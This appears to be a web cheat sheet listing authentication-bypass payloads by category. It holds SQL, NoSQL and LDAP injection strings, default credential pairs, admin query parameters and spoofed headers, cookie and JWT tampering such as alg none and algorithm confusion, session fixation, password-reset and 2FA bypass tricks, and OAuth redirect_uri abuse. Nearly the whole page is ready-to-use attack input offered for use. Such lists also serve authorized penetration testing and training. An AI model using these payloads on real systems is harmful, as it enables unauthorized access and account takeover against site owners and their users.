🔓 Authentication Bypass Payloads

SQL Injection

Bypass authentication via SQL injection

admin' OR '1'='1 admin' OR 1=1-- ' OR 1=1-- admin'-- admin' # ' OR 'x'='x

NoSQL Injection

Bypass MongoDB authentication

MongoDB {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} username[$ne]=admin&password[$ne]=pass

LDAP Injection

Bypass LDAP authentication

LDAP * admin)(&) *)(uid=*))(|(uid=*

Default Credentials

Common default username/password combinations

admin:admin admin:password administrator:administrator root:root root:toor admin:12345

Query Parameters

Modify URL parameters to bypass authorization checks

?admin=true ?role=admin ?authenticated=1 ?isAdmin=true ?user=admin

HTTP Headers

Bypass authentication via header injection

X-Original-URL: /admin X-Rewrite-URL: /admin X-Forwarded-For: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 X-Originating-IP: 127.0.0.1

Cookie Manipulation

Modify cookie values for privilege escalation

admin=true isAdmin=1 role=admin authenticated=yes

JWT Manipulation

Exploit JWT token vulnerabilities

JWT Change "alg" to "none" Change "role": "user" to "role": "admin" RS256 to HS256 algorithm confusion

Test with tools: jwt.io, jwt_tool

Session Fixation

Force user to use known session ID

Set session ID before login: ?PHPSESSID=attacker_session Session ID doesn't change after login

Password Reset

Exploit weak password reset mechanisms

Try sequential tokens: token=1, token=2, etc. Manipulate email parameter: email=victim@test.com Reuse old tokens Race condition: request multiple tokens

2FA Bypass

Techniques to bypass two-factor authentication

Remove 2FA parameter from request Try direct access to /dashboard after login Manipulate response: change "2fa_required": true to false Reuse old 2FA codes

OAuth Misconfiguration

Exploit OAuth implementation flaws

Change redirect_uri to attacker domain CSRF in OAuth flow Open redirect in redirect_uri